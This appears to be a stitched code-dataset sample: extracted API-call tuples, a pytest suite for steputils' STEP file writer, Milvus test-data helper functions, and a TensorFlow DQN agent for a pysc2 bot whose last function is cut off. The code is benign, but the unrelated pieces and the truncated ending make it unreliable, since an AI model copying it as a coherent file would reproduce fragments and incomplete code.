[((2748, 2835), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""attr"""', "['arr_shape', 'gdal_geotrans', 'projected_bounds']"], {}), "('attr', ['arr_shape', 'gdal_geotrans',\n 'projected_bounds'])\n", (2771, 2835), False, 'import pytest\n'), ((1864, 1888), 'descarteslabs.scenes.DLTile', 'scenes.DLTile', (['tile_dict'], {}), '(tile_dict)\n', (1877, 1888), False, 'from descarteslabs import scenes\n'), ((2203, 2226), 'descarteslabs.scenes.XYZTile', 'scenes.XYZTile', (['(3)', '(5)', '(4)'], {}), '(3, 5, 4)\n', (2217, 2226), False, 'from descarteslabs import scenes\n'), ((267, 354), 'pytest.raises', 'pytest.raises', (['TypeError'], {'match': '"""expected a `descarteslabs\\\\.scenes\\\\.GeoContext`"""'}), "(TypeError, match=\n 'expected a `descarteslabs\\\\.scenes\\\\.GeoContext`')\n", (280, 354), False, 'import pytest\n')]
|
# Created: 28.12.2019
# Copyright (c) 2019 <NAME>
# License: MIT License
import pytest
from io import StringIO
from steputils import p21
@pytest.fixture
def stpfile():
stp = p21.new_step_file()
timestamp = p21.timestamp()
stp.header.set_file_description(('notes1', 'notes2'))
stp.header.set_file_name('test.stp', timestamp)
section = stp.new_data_section()
section.add(p21.simple_entity_instance('#100', p21.entity('TEST', (1, 2, 3))))
section.add(p21.simple_entity_instance('#1', p21.entity('TEST', (3, 2, 1))))
stp.new_data_section(name='SEC1', schema='IFC2X3')
return stp
def test_has_reference(stpfile):
assert stpfile.has_reference('#100') is True
assert stpfile.has_reference('#1') is True
assert stpfile.has_reference('#2') is False
def test_new_named_data_section():
stp = p21.new_step_file()
stp.new_data_section()
assert len(stp.data) == 1
stp.new_data_section('WithName', 'Schema')
assert len(stp.data) == 2
with pytest.raises(ValueError):
# A named data section requires a file schema
stp.new_data_section('WithName')
def test_iter_protocol(stpfile):
result = list(stpfile)
assert len(result) == 2
assert p21.is_simple_entity_instance(result[0])
def test_step_file_getter(stpfile):
assert stpfile['#100'].ref == '#100'
assert stpfile['#1'].ref == '#1'
def test_step_file_delete_entity_instance_by_ref(stpfile):
assert stpfile['#100'].ref == '#100'
del stpfile['#100']
with pytest.raises(KeyError):
stpfile['#100']
def test_len(stpfile):
assert len(stpfile) == 2
def test_header(stpfile):
stpfile._set_schemas()
timestamp = stpfile.header['FILE_NAME'].params[1]
fp = StringIO()
stpfile.header.write(fp)
result = fp.getvalue().split('\n')
assert result[0] == "HEADER;"
assert result[1] == "FILE_DESCRIPTION(('notes1','notes2'),'2;1');"
assert result[2] == f"FILE_NAME('test.stp','{timestamp}','',(''),(''),'','');"
assert result[3] == "FILE_SCHEMA(('IFC2X3'));"
assert result[4] == "ENDSEC;"
def test_data_section_1(stpfile):
fp = StringIO()
stpfile.data[0].write(fp)
result = fp.getvalue().split('\n')
assert result[0] == 'DATA;'
assert result[1] == "#100=TEST(1,2,3);"
assert result[2] == "#1=TEST(3,2,1);"
assert result[-2] == 'ENDSEC;'
def test_data_section_2(stpfile):
fp = StringIO()
stpfile.data[1].write(fp)
result = fp.getvalue().split('\n')
assert result[0] == "DATA('SEC1',('IFC2X3'));"
assert result[-2] == 'ENDSEC;'
def test_iso_10303_21_marker(stpfile):
result = str(stpfile).split('\n')
assert result[0] == 'ISO-10303-21;'
    # StringIO output ends with '\n', so split('\n') leaves a trailing ''
assert result[-2] == 'END-ISO-10303-21;'
def test_creation_of_file_schema_entry(stpfile):
assert 'FILE_SCHEMA' not in stpfile.header
# FILE_SCHEMA will be created automatically if not defined by user, but is ('NONE')
# if data sections have no schema attribute.
stpfile._set_schemas()
entry = stpfile.header['FILE_SCHEMA']
assert entry.params[0] == ('IFC2X3',)
if __name__ == '__main__':
pytest.main([__file__])
|
[
"steputils.p21.timestamp",
"io.StringIO",
"pytest.main",
"pytest.raises",
"steputils.p21.new_step_file",
"steputils.p21.is_simple_entity_instance",
"steputils.p21.entity"
] |
[((181, 200), 'steputils.p21.new_step_file', 'p21.new_step_file', ([], {}), '()\n', (198, 200), False, 'from steputils import p21\n'), ((217, 232), 'steputils.p21.timestamp', 'p21.timestamp', ([], {}), '()\n', (230, 232), False, 'from steputils import p21\n'), ((840, 859), 'steputils.p21.new_step_file', 'p21.new_step_file', ([], {}), '()\n', (857, 859), False, 'from steputils import p21\n'), ((1226, 1266), 'steputils.p21.is_simple_entity_instance', 'p21.is_simple_entity_instance', (['result[0]'], {}), '(result[0])\n', (1255, 1266), False, 'from steputils import p21\n'), ((1739, 1749), 'io.StringIO', 'StringIO', ([], {}), '()\n', (1747, 1749), False, 'from io import StringIO\n'), ((2136, 2146), 'io.StringIO', 'StringIO', ([], {}), '()\n', (2144, 2146), False, 'from io import StringIO\n'), ((2414, 2424), 'io.StringIO', 'StringIO', ([], {}), '()\n', (2422, 2424), False, 'from io import StringIO\n'), ((3166, 3189), 'pytest.main', 'pytest.main', (['[__file__]'], {}), '([__file__])\n', (3177, 3189), False, 'import pytest\n'), ((1003, 1028), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (1016, 1028), False, 'import pytest\n'), ((1518, 1541), 'pytest.raises', 'pytest.raises', (['KeyError'], {}), '(KeyError)\n', (1531, 1541), False, 'import pytest\n'), ((431, 460), 'steputils.p21.entity', 'p21.entity', (['"""TEST"""', '(1, 2, 3)'], {}), "('TEST', (1, 2, 3))\n", (441, 460), False, 'from steputils import p21\n'), ((512, 541), 'steputils.p21.entity', 'p21.entity', (['"""TEST"""', '(3, 2, 1)'], {}), "('TEST', (3, 2, 1))\n", (522, 541), False, 'from steputils import p21\n')]
|
import os
import random
import string
import numpy as np
import pandas as pd
from sklearn import preprocessing
from pymilvus_orm.types import DataType
from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper
from common import common_type as ct
from utils.util_log import test_log as log
import threading
import traceback
"""" Methods of processing data """
l2 = lambda x, y: np.linalg.norm(np.array(x) - np.array(y))
def gen_unique_str(str_value=None):
prefix = "".join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
return "test_" + prefix if str_value is None else str_value + "_" + prefix
def gen_str_by_length(length=8):
return "".join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
def gen_int64_field(name=ct.default_int64_field_name, description=ct.default_desc, is_primary=False, **kwargs):
int64_field, _ = ApiFieldSchemaWrapper().init_field_schema(name=name, dtype=DataType.INT64, description=description,
is_primary=is_primary, **kwargs)
return int64_field
def gen_float_field(name=ct.default_float_field_name, is_primary=False, description=ct.default_desc):
float_field, _ = ApiFieldSchemaWrapper().init_field_schema(name=name, dtype=DataType.FLOAT, description=description,
is_primary=is_primary)
return float_field
def gen_float_vec_field(name=ct.default_float_vec_field_name, is_primary=False, dim=ct.default_dim,
description=ct.default_desc):
float_vec_field, _ = ApiFieldSchemaWrapper().init_field_schema(name=name, dtype=DataType.FLOAT_VECTOR,
description=description, dim=dim,
is_primary=is_primary)
return float_vec_field
def gen_binary_vec_field(name=ct.default_binary_vec_field_name, is_primary=False, dim=ct.default_dim,
description=ct.default_desc):
binary_vec_field, _ = ApiFieldSchemaWrapper().init_field_schema(name=name, dtype=DataType.BINARY_VECTOR,
description=description, dim=dim,
is_primary=is_primary)
return binary_vec_field
def gen_default_collection_schema(description=ct.default_desc, primary_field=ct.default_int64_field_name, auto_id=False):
fields = [gen_int64_field(), gen_float_field(), gen_float_vec_field()]
schema, _ = ApiCollectionSchemaWrapper().init_collection_schema(fields=fields, description=description,
primary_field=primary_field, auto_id=auto_id)
return schema
def gen_collection_schema(fields, primary_field=None, description=ct.default_desc, auto_id=False):
schema, _ = ApiCollectionSchemaWrapper().init_collection_schema(fields=fields, primary_field=primary_field,
description=description, auto_id=auto_id)
return schema
def gen_default_binary_collection_schema(description=ct.default_desc, primary_field=ct.default_int64_field_name):
fields = [gen_int64_field(), gen_float_field(), gen_binary_vec_field()]
binary_schema, _ = ApiCollectionSchemaWrapper().init_collection_schema(fields=fields, description=description,
primary_field=primary_field)
return binary_schema
def gen_vectors(nb, dim):
vectors = [[random.random() for _ in range(dim)] for _ in range(nb)]
vectors = preprocessing.normalize(vectors, axis=1, norm='l2')
return vectors.tolist()
def gen_binary_vectors(num, dim):
raw_vectors = []
binary_vectors = []
for _ in range(num):
raw_vector = [random.randint(0, 1) for _ in range(dim)]
raw_vectors.append(raw_vector)
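        # np.packbits packs the 0/1 list MSB-first into uint8 bytes,
        # e.g. [1, 0, 0, 0, 0, 0, 0, 1] -> [0b10000001] == [129]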
binary_vectors.append(bytes(np.packbits(raw_vector, axis=-1).tolist()))
return raw_vectors, binary_vectors
def gen_default_dataframe_data(nb=ct.default_nb, dim=ct.default_dim, start=0):
int_values = pd.Series(data=[i for i in range(start, start + nb)])
float_values = pd.Series(data=[float(i) for i in range(start, start + nb)], dtype="float32")
float_vec_values = gen_vectors(nb, dim)
df = pd.DataFrame({
ct.default_int64_field_name: int_values,
ct.default_float_field_name: float_values,
ct.default_float_vec_field_name: float_vec_values
})
return df
def gen_default_binary_dataframe_data(nb=ct.default_nb, dim=ct.default_dim, start=0):
int_values = pd.Series(data=[i for i in range(start, start + nb)])
float_values = pd.Series(data=[float(i) for i in range(start, start + nb)], dtype="float32")
binary_raw_values, binary_vec_values = gen_binary_vectors(nb, dim)
df = pd.DataFrame({
ct.default_int64_field_name: int_values,
ct.default_float_field_name: float_values,
ct.default_binary_vec_field_name: binary_vec_values
})
return df, binary_raw_values
def gen_default_list_data(nb=ct.default_nb, dim=ct.default_dim):
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = gen_vectors(nb, dim)
data = [int_values, float_values, float_vec_values]
return data
def gen_default_tuple_data(nb=ct.default_nb, dim=ct.default_dim):
int_values = [i for i in range(nb)]
float_values = [float(i) for i in range(nb)]
float_vec_values = gen_vectors(nb, dim)
data = (int_values, float_values, float_vec_values)
return data
def gen_numpy_data(nb=ct.default_nb, dim=ct.default_dim):
int_values = np.arange(nb, dtype='int64')
float_values = np.arange(nb, dtype='float32')
float_vec_values = gen_vectors(nb, dim)
data = [int_values, float_values, float_vec_values]
return data
def gen_default_binary_list_data(nb=ct.default_nb, dim=ct.default_dim):
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
binary_raw_values, binary_vec_values = gen_binary_vectors(nb, dim)
data = [int_values, float_values, binary_vec_values]
return data, binary_raw_values
def gen_simple_index():
index_params = []
for i in range(len(ct.all_index_types)):
if ct.all_index_types[i] in ct.binary_support:
continue
dic = {"index_type": ct.all_index_types[i], "metric_type": "L2"}
dic.update({"params": ct.default_index_params[i]})
index_params.append(dic)
return index_params
def gen_invalid_field_types():
field_types = [
6,
1.0,
[[]],
{},
(),
"",
"a"
]
return field_types
def gen_all_type_fields():
fields = []
for k, v in DataType.__members__.items():
if v != DataType.UNKNOWN:
field, _ = ApiFieldSchemaWrapper().init_field_schema(name=k.lower(), dtype=v)
fields.append(field)
return fields
def gen_normal_expressions():
expressions = [
"",
"int64 > 0",
"(int64 > 0 && int64 < 400) or (int64 > 500 && int64 < 1000)",
"int64 not in [1, 2, 3]",
"int64 in [1, 2, 3] and float != 2",
"int64 == 0 || int64 == 1 || int64 == 2",
]
return expressions
def jaccard(x, y):
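    # Jaccard distance over boolean vectors: 1 - |x AND y| / |x OR y|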
x = np.asarray(x, np.bool)
y = np.asarray(y, np.bool)
return 1 - np.double(np.bitwise_and(x, y).sum()) / np.double(np.bitwise_or(x, y).sum())
def hamming(x, y):
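    # Hamming distance: the number of bit positions where x and y differ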
x = np.asarray(x, np.bool)
y = np.asarray(y, np.bool)
return np.bitwise_xor(x, y).sum()
def tanimoto(x, y):
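    # Tanimoto distance: -log2 of the Jaccard similarity |x AND y| / |x OR y|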
x = np.asarray(x, np.bool)
y = np.asarray(y, np.bool)
return -np.log2(np.double(np.bitwise_and(x, y).sum()) / np.double(np.bitwise_or(x, y).sum()))
def substructure(x, y):
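    # Substructure distance: 1 - |x AND y| / |y|; 0 when y's set bits are a subset of x's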
x = np.asarray(x, np.bool)
y = np.asarray(y, np.bool)
return 1 - np.double(np.bitwise_and(x, y).sum()) / np.count_nonzero(y)
def superstructure(x, y):
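    # Superstructure distance: 1 - |x AND y| / |x|; 0 when x's set bits are a subset of y's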
x = np.asarray(x, np.bool)
y = np.asarray(y, np.bool)
return 1 - np.double(np.bitwise_and(x, y).sum()) / np.count_nonzero(x)
def modify_file(file_path_list, is_modify=False, input_content=""):
"""
    file_path_list : list of file paths -> list[<file_path>]
    is_modify : whether the file needs to be reset
    input_content : the content to insert into the file
"""
if not isinstance(file_path_list, list):
log.error("[modify_file] file is not a list.")
for file_path in file_path_list:
folder_path, file_name = os.path.split(file_path)
if not os.path.isdir(folder_path):
log.debug("[modify_file] folder(%s) is not exist." % folder_path)
os.makedirs(folder_path)
if not os.path.isfile(file_path):
log.error("[modify_file] file(%s) is not exist." % file_path)
else:
if is_modify is True:
log.debug("[modify_file] start modifying file(%s)..." % file_path)
with open(file_path, "r+") as f:
f.seek(0)
f.truncate()
f.write(input_content)
f.close()
log.info("[modify_file] file(%s) modification is complete." % file_path_list)
def index_to_dict(index):
return {
"collection_name": index.collection_name,
"field_name": index.field_name,
# "name": index.name,
"params": index.params
}
def assert_equal_index(index_1, index_2):
return index_to_dict(index_1) == index_to_dict(index_2)
def gen_partitions(collection_w, partition_num=1):
"""
target: create extra partitions except for _default
    method: create more than one partition
expected: return collection and raw data
"""
log.info("gen_partitions: creating partitions")
for i in range(partition_num):
partition_name = "search_partition_" + str(i)
collection_w.create_partition(partition_name=partition_name,
description="search partition")
par = collection_w.partitions
assert len(par) == (partition_num + 1)
log.info("gen_partitions: created partitions %s" % par)
def insert_data(collection_w, nb=3000, is_binary=False):
"""
target: insert non-binary/binary data
method: insert non-binary/binary data into partitions if any
expected: return collection and raw data
"""
par = collection_w.partitions
num = len(par)
vectors = []
binary_raw_vectors = []
log.info("insert_data: inserting data into collection %s (num_entities: %s)"
% (collection_w.name, nb))
for i in range(num):
if is_binary:
default_data, binary_raw_data = gen_default_binary_dataframe_data(nb // num)
binary_raw_vectors.extend(binary_raw_data)
else:
default_data = gen_default_dataframe_data(nb // num)
collection_w.insert(default_data, par[i].name)
vectors.append(default_data)
log.info("insert_data: inserted data into collection %s (num_entities: %s)"
% (collection_w.name, nb))
return collection_w, vectors, binary_raw_vectors
|
[
"numpy.bitwise_xor",
"utils.util_log.test_log.error",
"os.path.isfile",
"numpy.arange",
"base.schema_wrapper.ApiFieldSchemaWrapper",
"numpy.bitwise_or",
"pandas.DataFrame",
"base.schema_wrapper.ApiCollectionSchemaWrapper",
"random.randint",
"utils.util_log.test_log.debug",
"utils.util_log.test_log.info",
"numpy.asarray",
"numpy.packbits",
"random.random",
"sklearn.preprocessing.normalize",
"numpy.count_nonzero",
"os.makedirs",
"os.path.isdir",
"numpy.float32",
"random.choice",
"numpy.array",
"numpy.bitwise_and",
"os.path.split",
"pymilvus_orm.types.DataType.__members__.items"
] |
[((3773, 3824), 'sklearn.preprocessing.normalize', 'preprocessing.normalize', (['vectors'], {'axis': '(1)', 'norm': '"""l2"""'}), "(vectors, axis=1, norm='l2')\n", (3796, 3824), False, 'from sklearn import preprocessing\n'), ((4483, 4641), 'pandas.DataFrame', 'pd.DataFrame', (['{ct.default_int64_field_name: int_values, ct.default_float_field_name:\n float_values, ct.default_float_vec_field_name: float_vec_values}'], {}), '({ct.default_int64_field_name: int_values, ct.\n default_float_field_name: float_values, ct.default_float_vec_field_name:\n float_vec_values})\n', (4495, 4641), True, 'import pandas as pd\n'), ((5013, 5174), 'pandas.DataFrame', 'pd.DataFrame', (['{ct.default_int64_field_name: int_values, ct.default_float_field_name:\n float_values, ct.default_binary_vec_field_name: binary_vec_values}'], {}), '({ct.default_int64_field_name: int_values, ct.\n default_float_field_name: float_values, ct.\n default_binary_vec_field_name: binary_vec_values})\n', (5025, 5174), True, 'import pandas as pd\n'), ((5855, 5883), 'numpy.arange', 'np.arange', (['nb'], {'dtype': '"""int64"""'}), "(nb, dtype='int64')\n", (5864, 5883), True, 'import numpy as np\n'), ((5903, 5933), 'numpy.arange', 'np.arange', (['nb'], {'dtype': '"""float32"""'}), "(nb, dtype='float32')\n", (5912, 5933), True, 'import numpy as np\n'), ((6968, 6996), 'pymilvus_orm.types.DataType.__members__.items', 'DataType.__members__.items', ([], {}), '()\n', (6994, 6996), False, 'from pymilvus_orm.types import DataType\n'), ((7516, 7538), 'numpy.asarray', 'np.asarray', (['x', 'np.bool'], {}), '(x, np.bool)\n', (7526, 7538), True, 'import numpy as np\n'), ((7547, 7569), 'numpy.asarray', 'np.asarray', (['y', 'np.bool'], {}), '(y, np.bool)\n', (7557, 7569), True, 'import numpy as np\n'), ((7691, 7713), 'numpy.asarray', 'np.asarray', (['x', 'np.bool'], {}), '(x, np.bool)\n', (7701, 7713), True, 'import numpy as np\n'), ((7722, 7744), 'numpy.asarray', 'np.asarray', (['y', 'np.bool'], {}), '(y, np.bool)\n', (7732, 7744), True, 'import numpy as np\n'), ((7813, 7835), 'numpy.asarray', 'np.asarray', (['x', 'np.bool'], {}), '(x, np.bool)\n', (7823, 7835), True, 'import numpy as np\n'), ((7844, 7866), 'numpy.asarray', 'np.asarray', (['y', 'np.bool'], {}), '(y, np.bool)\n', (7854, 7866), True, 'import numpy as np\n'), ((7999, 8021), 'numpy.asarray', 'np.asarray', (['x', 'np.bool'], {}), '(x, np.bool)\n', (8009, 8021), True, 'import numpy as np\n'), ((8030, 8052), 'numpy.asarray', 'np.asarray', (['y', 'np.bool'], {}), '(y, np.bool)\n', (8040, 8052), True, 'import numpy as np\n'), ((8164, 8186), 'numpy.asarray', 'np.asarray', (['x', 'np.bool'], {}), '(x, np.bool)\n', (8174, 8186), True, 'import numpy as np\n'), ((8195, 8217), 'numpy.asarray', 'np.asarray', (['y', 'np.bool'], {}), '(y, np.bool)\n', (8205, 8217), True, 'import numpy as np\n'), ((9942, 9989), 'utils.util_log.test_log.info', 'log.info', (['"""gen_partitions: creating partitions"""'], {}), "('gen_partitions: creating partitions')\n", (9950, 9989), True, 'from utils.util_log import test_log as log\n'), ((10299, 10354), 'utils.util_log.test_log.info', 'log.info', (["('gen_partitions: created partitions %s' % par)"], {}), "('gen_partitions: created partitions %s' % par)\n", (10307, 10354), True, 'from utils.util_log import test_log as log\n'), ((10684, 10797), 'utils.util_log.test_log.info', 'log.info', (["('insert_data: inserting data into collection %s (num_entities: %s)' % (\n collection_w.name, nb))"], {}), "(\n 'insert_data: inserting data into collection %s (num_entities: %s)' % (\n 
collection_w.name, nb))\n", (10692, 10797), True, 'from utils.util_log import test_log as log\n'), ((11167, 11273), 'utils.util_log.test_log.info', 'log.info', (["('insert_data: inserted data into collection %s (num_entities: %s)' % (\n collection_w.name, nb))"], {}), "('insert_data: inserted data into collection %s (num_entities: %s)' %\n (collection_w.name, nb))\n", (11175, 11273), True, 'from utils.util_log import test_log as log\n'), ((5355, 5368), 'numpy.float32', 'np.float32', (['i'], {}), '(i)\n', (5365, 5368), True, 'import numpy as np\n'), ((6184, 6197), 'numpy.float32', 'np.float32', (['i'], {}), '(i)\n', (6194, 6197), True, 'import numpy as np\n'), ((8594, 8640), 'utils.util_log.test_log.error', 'log.error', (['"""[modify_file] file is not a list."""'], {}), "('[modify_file] file is not a list.')\n", (8603, 8640), True, 'from utils.util_log import test_log as log\n'), ((8712, 8736), 'os.path.split', 'os.path.split', (['file_path'], {}), '(file_path)\n', (8725, 8736), False, 'import os\n'), ((418, 429), 'numpy.array', 'np.array', (['x'], {}), '(x)\n', (426, 429), True, 'import numpy as np\n'), ((432, 443), 'numpy.array', 'np.array', (['y'], {}), '(y)\n', (440, 443), True, 'import numpy as np\n'), ((504, 555), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (517, 555), False, 'import random\n'), ((708, 759), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (721, 759), False, 'import random\n'), ((919, 942), 'base.schema_wrapper.ApiFieldSchemaWrapper', 'ApiFieldSchemaWrapper', ([], {}), '()\n', (940, 942), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((1263, 1286), 'base.schema_wrapper.ApiFieldSchemaWrapper', 'ApiFieldSchemaWrapper', ([], {}), '()\n', (1284, 1286), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((1653, 1676), 'base.schema_wrapper.ApiFieldSchemaWrapper', 'ApiFieldSchemaWrapper', ([], {}), '()\n', (1674, 1676), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((2138, 2161), 'base.schema_wrapper.ApiFieldSchemaWrapper', 'ApiFieldSchemaWrapper', ([], {}), '()\n', (2159, 2161), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((2657, 2685), 'base.schema_wrapper.ApiCollectionSchemaWrapper', 'ApiCollectionSchemaWrapper', ([], {}), '()\n', (2683, 2685), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((2998, 3026), 'base.schema_wrapper.ApiCollectionSchemaWrapper', 'ApiCollectionSchemaWrapper', ([], {}), '()\n', (3024, 3026), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((3437, 3465), 'base.schema_wrapper.ApiCollectionSchemaWrapper', 'ApiCollectionSchemaWrapper', ([], {}), '()\n', (3463, 3465), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((3702, 3717), 'random.random', 'random.random', ([], {}), '()\n', (3715, 3717), False, 'import random\n'), ((3981, 4001), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (3995, 4001), False, 'import random\n'), ((7756, 7776), 'numpy.bitwise_xor', 'np.bitwise_xor', (['x', 'y'], {}), '(x, y)\n', (7770, 7776), True, 'import numpy as np\n'), ((8108, 8127), 'numpy.count_nonzero', 'np.count_nonzero', (['y'], {}), '(y)\n', (8124, 8127), 
True, 'import numpy as np\n'), ((8273, 8292), 'numpy.count_nonzero', 'np.count_nonzero', (['x'], {}), '(x)\n', (8289, 8292), True, 'import numpy as np\n'), ((8752, 8778), 'os.path.isdir', 'os.path.isdir', (['folder_path'], {}), '(folder_path)\n', (8765, 8778), False, 'import os\n'), ((8792, 8857), 'utils.util_log.test_log.debug', 'log.debug', (["('[modify_file] folder(%s) is not exist.' % folder_path)"], {}), "('[modify_file] folder(%s) is not exist.' % folder_path)\n", (8801, 8857), True, 'from utils.util_log import test_log as log\n'), ((8870, 8894), 'os.makedirs', 'os.makedirs', (['folder_path'], {}), '(folder_path)\n', (8881, 8894), False, 'import os\n'), ((8911, 8936), 'os.path.isfile', 'os.path.isfile', (['file_path'], {}), '(file_path)\n', (8925, 8936), False, 'import os\n'), ((8950, 9011), 'utils.util_log.test_log.error', 'log.error', (["('[modify_file] file(%s) is not exist.' % file_path)"], {}), "('[modify_file] file(%s) is not exist.' % file_path)\n", (8959, 9011), True, 'from utils.util_log import test_log as log\n'), ((9076, 9142), 'utils.util_log.test_log.debug', 'log.debug', (["('[modify_file] start modifying file(%s)...' % file_path)"], {}), "('[modify_file] start modifying file(%s)...' % file_path)\n", (9085, 9142), True, 'from utils.util_log import test_log as log\n'), ((9344, 9421), 'utils.util_log.test_log.info', 'log.info', (["('[modify_file] file(%s) modification is complete.' % file_path_list)"], {}), "('[modify_file] file(%s) modification is complete.' % file_path_list)\n", (9352, 9421), True, 'from utils.util_log import test_log as log\n'), ((7055, 7078), 'base.schema_wrapper.ApiFieldSchemaWrapper', 'ApiFieldSchemaWrapper', ([], {}), '()\n', (7076, 7078), False, 'from base.schema_wrapper import ApiCollectionSchemaWrapper, ApiFieldSchemaWrapper\n'), ((4098, 4130), 'numpy.packbits', 'np.packbits', (['raw_vector'], {'axis': '(-1)'}), '(raw_vector, axis=-1)\n', (4109, 4130), True, 'import numpy as np\n'), ((7595, 7615), 'numpy.bitwise_and', 'np.bitwise_and', (['x', 'y'], {}), '(x, y)\n', (7609, 7615), True, 'import numpy as np\n'), ((7635, 7654), 'numpy.bitwise_or', 'np.bitwise_or', (['x', 'y'], {}), '(x, y)\n', (7648, 7654), True, 'import numpy as np\n'), ((8078, 8098), 'numpy.bitwise_and', 'np.bitwise_and', (['x', 'y'], {}), '(x, y)\n', (8092, 8098), True, 'import numpy as np\n'), ((8243, 8263), 'numpy.bitwise_and', 'np.bitwise_and', (['x', 'y'], {}), '(x, y)\n', (8257, 8263), True, 'import numpy as np\n'), ((7897, 7917), 'numpy.bitwise_and', 'np.bitwise_and', (['x', 'y'], {}), '(x, y)\n', (7911, 7917), True, 'import numpy as np\n'), ((7937, 7956), 'numpy.bitwise_or', 'np.bitwise_or', (['x', 'y'], {}), '(x, y)\n', (7950, 7956), True, 'import numpy as np\n')]
|
import datetime
import os
from collections import deque
import random
import numpy as np
import tensorflow as tf
import pysc2.agents.myAgent.myAgent_6.config.config as config
from pysc2.agents.myAgent.myAgent_6.net.lenet import Lenet
class DQN():
    def __init__(self, mu, sigma, learning_rate, actiondim, parameterdim, statedim, name):  # initialization
        # Initialize the replay buffer; REPLAY_SIZE sets its maximum length
        self.replay_buffer = deque(maxlen=config.REPLAY_SIZE)
        # Neural-network parameters
self.mu = mu
self.sigma = sigma
self.learning_rate = learning_rate
self.time_step = 0
self.epsilon = config.INITIAL_EPSILON
        # Action dimension, action-parameter dimension (default 6), state dimension
self.action_dim = actiondim
self.parameterdim = parameterdim
self.state_dim = statedim
        # Network initialization
self.name = name
self.net = Lenet(self.mu, self.sigma, self.learning_rate, self.action_dim, self.parameterdim, self.state_dim, self.name)
# Init session
self.session = tf.InteractiveSession()
self.session.run(tf.initialize_all_variables())
self.modelSaver = tf.train.Saver()
self.recordSaver = None
self.recordCount = 0
self.restoreModelMark = True
def restoreModel(self, modelLoadPath):
self.modelSaver.restore(self.session, modelLoadPath + '/' + self.name + '.ckpt')
def saveModel(self, modelSavePath, episode):
if episode % config.MODEL_SAVE_EPISODE == 0:
thisPath = modelSavePath + 'episode_' + str(episode) + '/'
try:
os.makedirs(thisPath)
except OSError:
pass
            self.modelSaver.save(self.session, thisPath + self.name + '.ckpt')
def saveRecord(self, modelSavePath, data):
if self.recordSaver is None:
thisPath = modelSavePath
self.recordSaver = tf.summary.FileWriter(thisPath, self.session.graph)
data_summary = tf.Summary(value=[tf.Summary.Value(tag=self.name + '_' + "loss", simple_value=data)])
self.recordSaver.add_summary(summary=data_summary, global_step=self.recordCount)
self.recordCount += 1
    def perceive(self, state, action, reward, next_state, done):  # store a transition in the replay buffer
one_hot_action = np.zeros(self.action_dim + self.parameterdim, dtype=np.float32)
one_hot_action[int(action[0])] = 1
if self.parameterdim != 0:
one_hot_action[self.action_dim:] = action[1:]
state = np.squeeze(state)
next_state = np.squeeze(next_state)
self.replay_buffer.append([state, one_hot_action, reward, next_state, done])
    def train_Q_network(self, modelSavePath, episode):  # train the network
if len(self.replay_buffer) > config.BATCH_SIZE:
for mark in range(config.LOOP):
minibatch = random.sample(self.replay_buffer, config.BATCH_SIZE)
state_batch = np.array([data[0] for data in minibatch])
action_batch = np.array([data[1] for data in minibatch])
reward_batch = np.array([data[2] for data in minibatch])
next_state_batch = np.array([data[3] for data in minibatch])
# Step 2: calculate y
y_batch = np.array([])
Q_value_batch = np.array(self.session.run(self.net.Q_value, {self.net.state_input: next_state_batch}))
for i in range(0, config.BATCH_SIZE):
done = minibatch[i][4]
if done:
temp = np.append(np.array(reward_batch[i]), np.array(Q_value_batch[i][self.action_dim:]))
temp = temp.reshape((1, 1 + self.parameterdim))
y_batch = np.append(y_batch, temp)
else:
temp = np.append(np.array(reward_batch[i] + config.GAMMA * np.max(Q_value_batch[i][0:self.action_dim])),
Q_value_batch[i][self.action_dim:])
temp = temp.reshape((1, 1 + self.parameterdim))
y_batch = np.append(y_batch, temp)
y_batch = np.array(y_batch).reshape(config.BATCH_SIZE, 1 + self.parameterdim)
_, loss = self.session.run([self.net.train_op, self.net.loss],
feed_dict={self.net.y_input: y_batch,
self.net.action_input: action_batch,
self.net.state_input: state_batch})
self.saveRecord(modelSavePath, loss)
self.saveModel(modelSavePath, episode)
    def egreedy_action(self, state):  # epsilon-greedy action selection
Q_value = self.session.run(self.net.Q_value, {self.net.state_input: state})[0]
# self.epsilon -= (config.INITIAL_EPSILON - config.FINAL_EPSILON) / 10000
if np.random.uniform() <= self.epsilon:
random_action = np.random.randint(0, self.action_dim)
random_parameter = np.random.rand(self.parameterdim)
random_action_and_parameter = np.append(random_action, random_parameter).flatten()
return random_action_and_parameter
else:
action = np.argmax(Q_value[0:self.action_dim])
parameter = np.array(Q_value[self.action_dim:(self.action_dim + self.parameterdim)])
action_and_parameter = np.append(action, parameter).flatten()
return action_and_parameter
def action(self, state, modelLoadPath):
if self.restoreModelMark == True and modelLoadPath is not None:
self.restoreModelMark = False
self.restoreModel(modelLoadPath)
            print(self.name + ' restored!')
Q_value = self.session.run(self.net.Q_value, {self.net.state_input: state})[0]
action = np.argmax(Q_value[0:self.action_dim])
parameter = np.array(Q_value[self.action_dim:(self.action_dim + self.parameterdim)])
action_and_parameter = np.append(action, parameter)
return action_and_parameter
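
# Illustrative sketch (not part of the original agent): train_Q_network above builds the
# Bellman target y = r for terminal transitions and y = r + GAMMA * max_a' Q(s', a')
# otherwise. The helper below restates that rule in plain numpy; `gamma` and the inputs
# are stand-ins rather than values taken from config.
def _bellman_target_sketch(reward, next_q_values, done, gamma=0.99):
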